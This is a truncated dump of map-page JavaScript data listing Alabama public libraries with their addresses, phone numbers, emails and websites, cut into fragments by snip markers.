,description:"\x3cb\x3eEnterprise Public Library\x3c/b\x3e\x3cbr\x3e101 East Grubbs Street\x3cbr\x3eEnterprise , AL 36330-2531\x3cbr\x3e334-347-2636\x3cbr\x3e334-393-6477\x3cbr\x3e\x3ca href=\"mailto:epl@sanman.net \" target=\"_blank\"\x3eepl@sanman.net \x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.enterprise-pub-library.net\" target=\"_blank\"\x3ehttp://www.enterprise-pub-library.net\x3c/a\x3e",infoWindow:{title:"Enterprise Public Library",basics:"\x3
...[SNIP]...
334-34",dscr:"\x3cb\x3eEnterprise Public Library\x3c/b\x3e\x3cbr\x3e101 East Grubbs Street\x3cbr\x3eEnterprise , AL 36330-2531\x3cbr\x3e334-347-2636\x3cbr\x3e334-393-6477\x3cbr\x3e\x3ca href=\"mailto:epl@sanman.net \" target=\"_blank\"\x3eepl@sanman.net \x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.enterprise-pub-library.net\" target=\"_blank\"\x3ehttp://www.enterprise-pub-library.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?outpu
...[SNIP]...
c Library",description:"\x3cb\x3eCherokee Public Library\x3c/b\x3e\x3cbr\x3e118 Church Street\x3cbr\x3eCherokee, AL 35616-0333\x3cbr\x3e256-359-4384\x3cbr\x3e256-359-4016\x3cbr\x3e\x3ca href=\"mailto:cherokeelibrary@yahoo.com\" target=\"_blank\"\x3echerokeelibrary@yahoo.com\x3c/a\x3e",infoWindow:{title:"Cherokee Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Cherokee Public Library118 Church StreetCherokee, AL 35616-0333256-359-4384256-",dscr:"\x3cb\x3eCherokee Public Library\x3c/b\x3e\x3cbr\x3e118 Church Street\x3cbr\x3eCherokee, AL 35616-0333\x3cbr\x3e256-359-4384\x3cbr\x3e256-359-4016\x3cbr\x3e\x3ca href=\"mailto:cherokeelibrary@yahoo.com\" target=\"_blank\"\x3echerokeelibrary@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.756697,-87.972264\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"F",fid:"gccddda
...[SNIP]...
,description:"\x3cb\x3eHelen Keller Public Library\x3c/b\x3e\x3cbr\x3e511 North Main Street \x3cbr\x3eTuscumbia, AL 35674-2059\x3cbr\x3e256-383-7065\x3cbr\x3e256-389-9057\x3cbr\x3e\x3ca href=\"mailto:mtu_ts@lmn.lib.al.us\" target=\"_blank\"\x3emtu_ts@lmn.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"Helen Keller Public Library",basics:"\x3cdiv transclude=\"iw\"\x3
...[SNIP]...
256-38",dscr:"\x3cb\x3eHelen Keller Public Library\x3c/b\x3e\x3cbr\x3e511 North Main Street \x3cbr\x3eTuscumbia, AL 35674-2059\x3cbr\x3e256-383-7065\x3cbr\x3e256-389-9057\x3cbr\x3e\x3ca href=\"mailto:mtu_ts@lmn.lib.al.us\" target=\"_blank\"\x3emtu_ts@lmn.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
ic Library",description:"\x3cb\x3eLeighton Public Library\x3c/b\x3e\x3cbr\x3e8740 Main Street\x3cbr\x3eLeighton, AL 35646-0484\x3cbr\x3e256-446-5380\x3cbr\x3e256-446-5380\x3cbr\x3e\x3ca href=\"mailto:lepubli2@hiwaay.net\" target=\"_blank\"\x3elepubli2@hiwaay.net\x3c/a\x3e",infoWindow:{title:"Leighton Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Leighton Public Library8740 Main StreetLeighton, AL 35646-0484256-446-5380256-4",dscr:"\x3cb\x3eLeighton Public Library\x3c/b\x3e\x3cbr\x3e8740 Main Street\x3cbr\x3eLeighton, AL 35646-0484\x3cbr\x3e256-446-5380\x3cbr\x3e256-446-5380\x3cbr\x3e\x3ca href=\"mailto:lepubli2@hiwaay.net\" target=\"_blank\"\x3elepubli2@hiwaay.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.700243,-87.529080\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"H",fid:"gd45213
...[SNIP]...
escription:"\x3cb\x3eAutauga-Prattville Public Library\x3c/b\x3e\x3cbr\x3e254 Doster Street\x3cbr\x3ePrattville, AL 36067-3900\x3cbr\x3e334-365-3396\x3cbr\x3e334-365-3397\x3cbr\x3e\x3ca href=\"mailto:jearnest@appl.info\" target=\"_blank\"\x3ejearnest@appl.info\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://appl.info\" target=\"_blank\"\x3ehttp://appl.info\x3c/a\x3e",infoWindow:{title:"Autauga-Prattville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\
...[SNIP]...
334-",dscr:"\x3cb\x3eAutauga-Prattville Public Library\x3c/b\x3e\x3cbr\x3e254 Doster Street\x3cbr\x3ePrattville, AL 36067-3900\x3cbr\x3e334-365-3396\x3cbr\x3e334-365-3397\x3cbr\x3e\x3ca href=\"mailto:jearnest@appl.info\" target=\"_blank\"\x3ejearnest@appl.info\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://appl.info\" target=\"_blank\"\x3ehttp://appl.info\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.456436
...[SNIP]...
description:"\x3cb\x3eBaldwin County Library Cooperative\x3c/b\x3e\x3cbr\x3e22251 Palmer Street\x3cbr\x3eRobertsdale, AL 36567\x3cbr\x3e251-970-4010\x3cbr\x3e251-970-4011\x3cbr\x3e\x3ca href=\"mailto:bclcdirector@gulftel.com\" target=\"_blank\"\x3ebclcdirector@gulftel.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://gulftel.com/bclc\" target=\"_blank\"\x3ehttp://gulftel.com/bclc\x3c/a\x3e",infoWindow:{title:"Baldwin County Library Cooperative",basics:"\x3cdiv transclude=\"iw
...[SNIP]...
251-9",dscr:"\x3cb\x3eBaldwin County Library Cooperative\x3c/b\x3e\x3cbr\x3e22251 Palmer Street\x3cbr\x3eRobertsdale, AL 36567\x3cbr\x3e251-970-4010\x3cbr\x3e251-970-4011\x3cbr\x3e\x3ca href=\"mailto:bclcdirector@gulftel.com\" target=\"_blank\"\x3ebclcdirector@gulftel.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://gulftel.com/bclc\" target=\"_blank\"\x3ehttp://gulftel.com/bclc\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x
...[SNIP]...
description:"\x3cb\x3eBay Minete Public Library\x3c/b\x3e\x3cbr\x3e205 West Second Street \x3cbr\x3eBay Minette, AL 36507-4838\x3cbr\x3e251-580-1648\x3cbr\x3e251-937-0339\x3cbr\x3e\x3ca href=\"mailto:jbailey@ci.bay-minette.al.us\" target=\"_blank\"\x3ejbailey@ci.bay-minette.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.bayminettepubliclibary.org\" target=\"_blank\"\x3ehttp://www.bayminettepubliclibary.org\x3c/a\x3e",infoWindow:{title:"Bay Minete Public Library",basics:"\x3c
...[SNIP]...
251-5",dscr:"\x3cb\x3eBay Minete Public Library\x3c/b\x3e\x3cbr\x3e205 West Second Street \x3cbr\x3eBay Minette, AL 36507-4838\x3cbr\x3e251-580-1648\x3cbr\x3e251-937-0339\x3cbr\x3e\x3ca href=\"mailto:jbailey@ci.bay-minette.al.us\" target=\"_blank\"\x3ejbailey@ci.bay-minette.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.bayminettepubliclibary.org\" target=\"_blank\"\x3ehttp://www.bayminettepubliclibary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output
...[SNIP]...
brary",description:"\x3cb\x3eDaphne Public Library\x3c/b\x3e\x3cbr\x3e618 Whispering Pines Road\x3cbr\x3eDaphne, AL 36526-1225\x3cbr\x3e251-621-2818\x3cbr\x3e251-621-3086\x3cbr\x3e\x3ca href=\"mailto:daphlib3@bellsouth.net\" target=\"_blank\"\x3edaphlib3@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.daphneal.com/library.htm\" target=\"_blank\"\x3ehttp://www.daphneal.com/library.htm\x3c/a\x3e",infoWindow:{title:"Daphne Public Library",basics:"\x3cdiv tran
...[SNIP]...
251-621-2818",dscr:"\x3cb\x3eDaphne Public Library\x3c/b\x3e\x3cbr\x3e618 Whispering Pines Road\x3cbr\x3eDaphne, AL 36526-1225\x3cbr\x3e251-621-2818\x3cbr\x3e251-621-3086\x3cbr\x3e\x3ca href=\"mailto:daphlib3@bellsouth.net\" target=\"_blank\"\x3edaphlib3@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.daphneal.com/library.htm\" target=\"_blank\"\x3ehttp://www.daphneal.com/library.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thu
...[SNIP]...
ry",description:"\x3cb\x3eFairhope Public Library\x3c/b\x3e\x3cbr\x3e161 North Section Street\x3cbr\x3eFairhope, AL 36532-2490\x3cbr\x3e251-928-7483\x3cbr\x3e251-928-9717\x3cbr\x3e\x3ca href=\"mailto:director@fairhopelibrary.org\" target=\"_blank\"\x3edirector@fairhopelibrary.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.fairhopelibrary.org\" target=\"_blank\"\x3ehttp://www.fairhopelibrary.org\x3c/a\x3e",infoWindow:{title:"Fairhope Public Library",basics:"\x3cdiv transclude=\
...[SNIP]...
251-928-7",dscr:"\x3cb\x3eFairhope Public Library\x3c/b\x3e\x3cbr\x3e161 North Section Street\x3cbr\x3eFairhope, AL 36532-2490\x3cbr\x3e251-928-7483\x3cbr\x3e251-928-9717\x3cbr\x3e\x3ca href=\"mailto:director@fairhopelibrary.org\" target=\"_blank\"\x3edirector@fairhopelibrary.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.fairhopelibrary.org\" target=\"_blank\"\x3ehttp://www.fairhopelibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26
...[SNIP]...
ic Library",description:"\x3cb\x3eFoley Public Library\x3c/b\x3e\x3cbr\x3e319 East Laurel Avenue\x3cbr\x3eFoley, AL 36535-2680\x3cbr\x3e251-943-7665\x3cbr\x3e251-943-8637\x3cbr\x3e\x3ca href=\"mailto:fpllib@hotmail.com\" target=\"_blank\"\x3efpllib@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.foleylibrary.org\" target=\"_blank\"\x3ehttp://www.foleylibrary.org\x3c/a\x3e",infoWindow:{title:"Foley Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e
...[SNIP]...
251-943-7665251-9",dscr:"\x3cb\x3eFoley Public Library\x3c/b\x3e\x3cbr\x3e319 East Laurel Avenue\x3cbr\x3eFoley, AL 36535-2680\x3cbr\x3e251-943-7665\x3cbr\x3e251-943-8637\x3cbr\x3e\x3ca href=\"mailto:fpllib@hotmail.com\" target=\"_blank\"\x3efpllib@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.foleylibrary.org\" target=\"_blank\"\x3ehttp://www.foleylibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x
...[SNIP]...
xcn:"",name:"Loxley Public Library",description:"\x3cb\x3eLoxley Public Library\x3c/b\x3e\x3cbr\x3e1001 Loxley Avenue\x3cbr\x3eLoxley, AL 36551-0527\x3cbr\x3e251-964-5695\x3cbr\x3e\x3ca href=\"mailto:loxlib@gulftel.com\" target=\"_blank\"\x3eloxlib@gulftel.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.gulftel.com/loxlib\" target=\"_blank\"\x3ehttp://www.gulftel.com/loxlib\x3c/a\x3e",infoWindow:{title:"Loxley Public Library",basics:"\x3cdiv transclude=\"iw\
...[SNIP]...
Loxley, AL 36551-0527251-964-5695loxlib@",dscr:"\x3cb\x3eLoxley Public Library\x3c/b\x3e\x3cbr\x3e1001 Loxley Avenue\x3cbr\x3eLoxley, AL 36551-0527\x3cbr\x3e251-964-5695\x3cbr\x3e\x3ca href=\"mailto:loxlib@gulftel.com\" target=\"_blank\"\x3eloxlib@gulftel.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.gulftel.com/loxlib\" target=\"_blank\"\x3ehttp://www.gulftel.com/loxlib\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=
...[SNIP]...
y",description:"\x3cb\x3eOrange Beach Public Library\x3c/b\x3e\x3cbr\x3e26267 Canal Road \x3cbr\x3eOrange Beach, AL 36561-1649\x3cbr\x3e251-981-2923\x3cbr\x3e251-981-2920\x3cbr\x3e\x3ca href=\"mailto:blee@cityoforangebeach.com\" target=\"_blank\"\x3eblee@cityoforangebeach.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.orangebeachlibrary.org\" target=\"_blank\"\x3ehttp://www.orangebeachlibrary.org\x3c/a\x3e",infoWindow:{title:"Orange Beach Public Library",basics:"\x3cdiv tr
...[SNIP]...
251-981-",dscr:"\x3cb\x3eOrange Beach Public Library\x3c/b\x3e\x3cbr\x3e26267 Canal Road \x3cbr\x3eOrange Beach, AL 36561-1649\x3cbr\x3e251-981-2923\x3cbr\x3e251-981-2920\x3cbr\x3e\x3ca href=\"mailto:blee@cityoforangebeach.com\" target=\"_blank\"\x3eblee@cityoforangebeach.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.orangebeachlibrary.org\" target=\"_blank\"\x3ehttp://www.orangebeachlibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbna
...[SNIP]...
car Johnson Memorial Library",description:"\x3cb\x3eOscar Johnson Memorial Library\x3c/b\x3e\x3cbr\x3eP O Box 309\x3cbr\x3eSilverhill, AL 35676-0309\x3cbr\x3e251-945-5201\x3cbr\x3e\x3ca href=\"mailto:tonj.dpl@acan.net\" target=\"_blank\"\x3etonj.dpl@acan.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.gulftel.com/bclc/bclibraries/silverhi.htm\" target=\"_blank\"\x3ehttp://www.gulftel.com/bclc/bclibraries/silverhi.htm\x3c/a\x3e",infoWindow:{title:"Oscar Joh
...[SNIP]...
erhill, AL 35676-0309251-945-5201t",dscr:"\x3cb\x3eOscar Johnson Memorial Library\x3c/b\x3e\x3cbr\x3eP O Box 309\x3cbr\x3eSilverhill, AL 35676-0309\x3cbr\x3e251-945-5201\x3cbr\x3e\x3ca href=\"mailto:tonj.dpl@acan.net\" target=\"_blank\"\x3etonj.dpl@acan.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.gulftel.com/bclc/bclibraries/silverhi.htm\" target=\"_blank\"\x3ehttp://www.gulftel.com/bclc/bclibraries/silverhi.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"htt
...[SNIP]...
cription:"\x3cb\x3eRobertsdale Public Library\x3c/b\x3e\x3cbr\x3e18301 Pennyslvania Street\x3cbr\x3eRobertsdale, AL 36567-3072\x3cbr\x3e251-947-5720\x3cbr\x3e251-947-5521\x3cbr\x3e\x3ca href=\"mailto:rdalelib@gulftel.com\" target=\"_blank\"\x3erdalelib@gulftel.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.geocities.com/capitolhill/9542/pl.htm\" target=\"_blank\"\x3ehttp://www.geocities.com/capitolhill/9542/pl.htm\x3c/a\x3e",infoWindow:{title:"Robertsdale Publi
...[SNIP]...
25",dscr:"\x3cb\x3eRobertsdale Public Library\x3c/b\x3e\x3cbr\x3e18301 Pennyslvania Street\x3cbr\x3eRobertsdale, AL 36567-3072\x3cbr\x3e251-947-5720\x3cbr\x3e251-947-5521\x3cbr\x3e\x3ca href=\"mailto:rdalelib@gulftel.com\" target=\"_blank\"\x3erdalelib@gulftel.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.geocities.com/capitolhill/9542/pl.htm\" target=\"_blank\"\x3ehttp://www.geocities.com/capitolhill/9542/pl.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0
...[SNIP]...
iption:"\x3cb\x3eThomas B. Norton Public Library\x3c/b\x3e\x3cbr\x3e221 West 19th Avenue \x3cbr\x3eGulf Shores , AL 36542-3055\x3cbr\x3e251-968-1176\x3cbr\x3e251-968-1184\x3cbr\x3e\x3ca href=\"mailto:wcongiardo@hotmail.com\" target=\"_blank\"\x3ewcongiardo@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.ci.gulf-shores.al.us/Library/libraryinfo.htm\" target=\"_blank\"\x3ehttp://www.ci.gulf-shores.al.us/Library/libraryinfo.htm\x3c/a\x3e",infoWindow:{title:"Tho
...[SNIP]...
",dscr:"\x3cb\x3eThomas B. Norton Public Library\x3c/b\x3e\x3cbr\x3e221 West 19th Avenue \x3cbr\x3eGulf Shores , AL 36542-3055\x3cbr\x3e251-968-1176\x3cbr\x3e251-968-1184\x3cbr\x3e\x3ca href=\"mailto:wcongiardo@hotmail.com\" target=\"_blank\"\x3ewcongiardo@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.ci.gulf-shores.al.us/Library/libraryinfo.htm\" target=\"_blank\"\x3ehttp://www.ci.gulf-shores.al.us/Library/libraryinfo.htm\x3c/a\x3e",dscr_dir:"ltr",photoUr
...[SNIP]...
hens Library",description:"\x3cb\x3eElton B. Stephens Library\x3c/b\x3e\x3cbr\x3e17 School Street\x3cbr\x3eClio, AL 36017-9298\x3cbr\x3e334-397-2911\x3cbr\x3e334-397-2912\x3cbr\x3e\x3ca href=\"mailto:elton005@centurytel.net\" target=\"_blank\"\x3eelton005@centurytel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.snowhill.com/\" target=\"_blank\"\x3ehttp://www.snowhill.com/\"ebslib\x3c/a\x3e",infoWindow:{title:"Elton B. Stephens Library",basics:"\x3cdiv transclude=\"i
...[SNIP]...
334-397-2911334-397",dscr:"\x3cb\x3eElton B. Stephens Library\x3c/b\x3e\x3cbr\x3e17 School Street\x3cbr\x3eClio, AL 36017-9298\x3cbr\x3e334-397-2911\x3cbr\x3e334-397-2912\x3cbr\x3e\x3ca href=\"mailto:elton005@centurytel.net\" target=\"_blank\"\x3eelton005@centurytel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.snowhill.com/\" target=\"_blank\"\x3ehttp://www.snowhill.com/\"ebslib\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90
...[SNIP]...
ary",description:"\x3cb\x3eEufaula Carnegie Library\x3c/b\x3e\x3cbr\x3e217 North Eufaula Drive\x3cbr\x3eEufaula, AL 36027-1515\x3cbr\x3e334-687-2337\x3cbr\x3e334-687-8143\x3cbr\x3e\x3ca href=\"mailto:eufaulacl@yahoo.com\" target=\"_blank\"\x3eeufaulacl@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.ecl.lib.al.us\" target=\"_blank\"\x3ehttp://www.ecl.lib.al.us\x3c/a\x3e",infoWindow:{title:"Eufaula Carnegie Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x
...[SNIP]...
334-687-23",dscr:"\x3cb\x3eEufaula Carnegie Library\x3c/b\x3e\x3cbr\x3e217 North Eufaula Drive\x3cbr\x3eEufaula, AL 36027-1515\x3cbr\x3e334-687-2337\x3cbr\x3e334-687-8143\x3cbr\x3e\x3ca href=\"mailto:eufaulacl@yahoo.com\" target=\"_blank\"\x3eeufaulacl@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.ecl.lib.al.us\" target=\"_blank\"\x3ehttp://www.ecl.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
description:"\x3cb\x3eTown and County Public Library\x3c/b\x3e\x3cbr\x3e45 North Midway Street\x3cbr\x3eClayton, AL 36016-0518\x3cbr\x3e334-775-3506\x3cbr\x3e334-775-3538\x3cbr\x3e\x3ca href=\"mailto:jolgot@aol.com\" target=\"_blank\"\x3ejolgot@aol.com\x3c/a\x3e",infoWindow:{title:"Town and County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Town and County Public Library45 North Midway StreetClayton, AL 36016-0518334-7",dscr:"\x3cb\x3eTown and County Public Library\x3c/b\x3e\x3cbr\x3e45 North Midway Street\x3cbr\x3eClayton, AL 36016-0518\x3cbr\x3e334-775-3506\x3cbr\x3e334-775-3538\x3cbr\x3e\x3ca href=\"mailto:jolgot@aol.com\" target=\"_blank\"\x3ejolgot@aol.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.880874,-85.449475\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"X",fid:"gee210e
...[SNIP]...
scription:"\x3cb\x3eBrent-Centreville Public Library\x3c/b\x3e\x3cbr\x3e20 Library Street\x3cbr\x3eCentreville , AL 35042-1322\x3cbr\x3e205-926-4736\x3cbr\x3e205-926-4736\x3cbr\x3e\x3ca href=\"mailto:bcpl@dbtech.net\" target=\"_blank\"\x3ebcpl@dbtech.net\x3c/a\x3e",infoWindow:{title:"Brent-Centreville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Brent-Centreville Public Library20 Library StreetCentreville , AL 35042-132
...[SNIP]...
205",dscr:"\x3cb\x3eBrent-Centreville Public Library\x3c/b\x3e\x3cbr\x3e20 Library Street\x3cbr\x3eCentreville , AL 35042-1322\x3cbr\x3e205-926-4736\x3cbr\x3e205-926-4736\x3cbr\x3e\x3ca href=\"mailto:bcpl@dbtech.net\" target=\"_blank\"\x3ebcpl@dbtech.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.945791,-87.149675\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"Y",fid:"g0b2b3b
...[SNIP]...
x3cb\x3eEunice Kelly Worthington Public Library\x3c/b\x3e\x3cbr\x3e321 Presbyterian Church Road\x3cbr\x3eGreen Pond , AL 35074\x3cbr\x3e205-938-0008\x3cbr\x3e205-938-0008\x3cbr\x3e\x3ca href=\"mailto:noelwhubbard@bellsouth.net\" target=\"_blank\"\x3enoelwhubbard@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Eunice Kelly Worthington Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Eunice Kelly Worthington Public Library321 Presbyterian Church RoadGr
...[SNIP]...
x3cb\x3eEunice Kelly Worthington Public Library\x3c/b\x3e\x3cbr\x3e321 Presbyterian Church Road\x3cbr\x3eGreen Pond , AL 35074\x3cbr\x3e205-938-0008\x3cbr\x3e205-938-0008\x3cbr\x3e\x3ca href=\"mailto:noelwhubbard@bellsouth.net\" target=\"_blank\"\x3enoelwhubbard@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.120117,-87.138296\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"Z",fid:"gfcfd80
...[SNIP]...
scription:"\x3cb\x3eWest Blocton Public Library\x3c/b\x3e\x3cbr\x3e62 Walter Owens Drive \x3cbr\x3eWest Blocton, AL 35184-0292\x3cbr\x3e205-938-3570\x3cbr\x3e205-938-7803\x3cbr\x3e\x3ca href=\"mailto:wbplib@toast.net\" target=\"_blank\"\x3ewbplib@toast.net\x3c/a\x3e",infoWindow:{title:"West Blocton Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"West Blocton Public Library62 Walter Owens Drive West Blocton, AL 35184-0292205",dscr:"\x3cb\x3eWest Blocton Public Library\x3c/b\x3e\x3cbr\x3e62 Walter Owens Drive \x3cbr\x3eWest Blocton, AL 35184-0292\x3cbr\x3e205-938-3570\x3cbr\x3e205-938-7803\x3cbr\x3e\x3ca href=\"mailto:wbplib@toast.net\" target=\"_blank\"\x3ewbplib@toast.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.137174,-87.133878\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc26",fid:"gf0
...[SNIP]...
,description:"\x3cb\x3eBlountsville Public Library\x3c/b\x3e\x3cbr\x3e65 Chestnut Street\x3cbr\x3eBlountsville , AL 35031-0219\x3cbr\x3e205-429-3156\x3cbr\x3e205-429-4806\x3cbr\x3e\x3ca href=\"mailto:blountsvillelib@hotmail.com\" target=\"_blank\"\x3eblountsvillelib@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://blountsvillepubliclibary.com\" target=\"_blank\"\x3ehttp://blountsvillepubliclibary.com\x3c/a\x3e",infoWindow:{title:"Blountsville Public Library",basics:"\x3cdi
...[SNIP]...
205-42",dscr:"\x3cb\x3eBlountsville Public Library\x3c/b\x3e\x3cbr\x3e65 Chestnut Street\x3cbr\x3eBlountsville , AL 35031-0219\x3cbr\x3e205-429-3156\x3cbr\x3e205-429-4806\x3cbr\x3e\x3ca href=\"mailto:blountsvillelib@hotmail.com\" target=\"_blank\"\x3eblountsvillelib@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://blountsvillepubliclibary.com\" target=\"_blank\"\x3ehttp://blountsvillepubliclibary.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thu
...[SNIP]...
Library",description:"\x3cb\x3eOneonta Public Library\x3c/b\x3e\x3cbr\x3e221 2nd Street South \x3cbr\x3eOneonta, AL 35121-1721\x3cbr\x3e205-274-7643\x3cbr\x3e205-274-7643\x3cbr\x3e\x3ca href=\"mailto:oplib@otelco.net\" target=\"_blank\"\x3eoplib@otelco.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"Oneonta Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c
...[SNIP]...
205-274-764320",dscr:"\x3cb\x3eOneonta Public Library\x3c/b\x3e\x3cbr\x3e221 2nd Street South \x3cbr\x3eOneonta, AL 35121-1721\x3cbr\x3e205-274-7643\x3cbr\x3e205-274-7643\x3cbr\x3e\x3ca href=\"mailto:oplib@otelco.net\" target=\"_blank\"\x3eoplib@otelco.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
Library",description:"\x3cb\x3eWoodville Public Library\x3c/b\x3e\x3cbr\x3e26 Venson Street\x3cbr\x3eWoodville, AL 35776-0116\x3cbr\x3e256-776-2796\x3cbr\x3e256-776-3294\x3cbr\x3e\x3ca href=\"mailto:publicw@bellsouth.net\" target=\"_blank\"\x3epublicw@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://home.bellsouth.net/p/PWP-woodville\" target=\"_blank\"\x3ehttp://home.bellsouth.net/p/PWP-woodville\x3c/a\x3e",infoWindow:{title:"Woodville Public Library",basic
...[SNIP]...
256-776-2796256",dscr:"\x3cb\x3eWoodville Public Library\x3c/b\x3e\x3cbr\x3e26 Venson Street\x3cbr\x3eWoodville, AL 35776-0116\x3cbr\x3e256-776-2796\x3cbr\x3e256-776-3294\x3cbr\x3e\x3ca href=\"mailto:publicw@bellsouth.net\" target=\"_blank\"\x3epublicw@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://home.bellsouth.net/p/PWP-woodville\" target=\"_blank\"\x3ehttp://home.bellsouth.net/p/PWP-woodville\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cb
...[SNIP]...
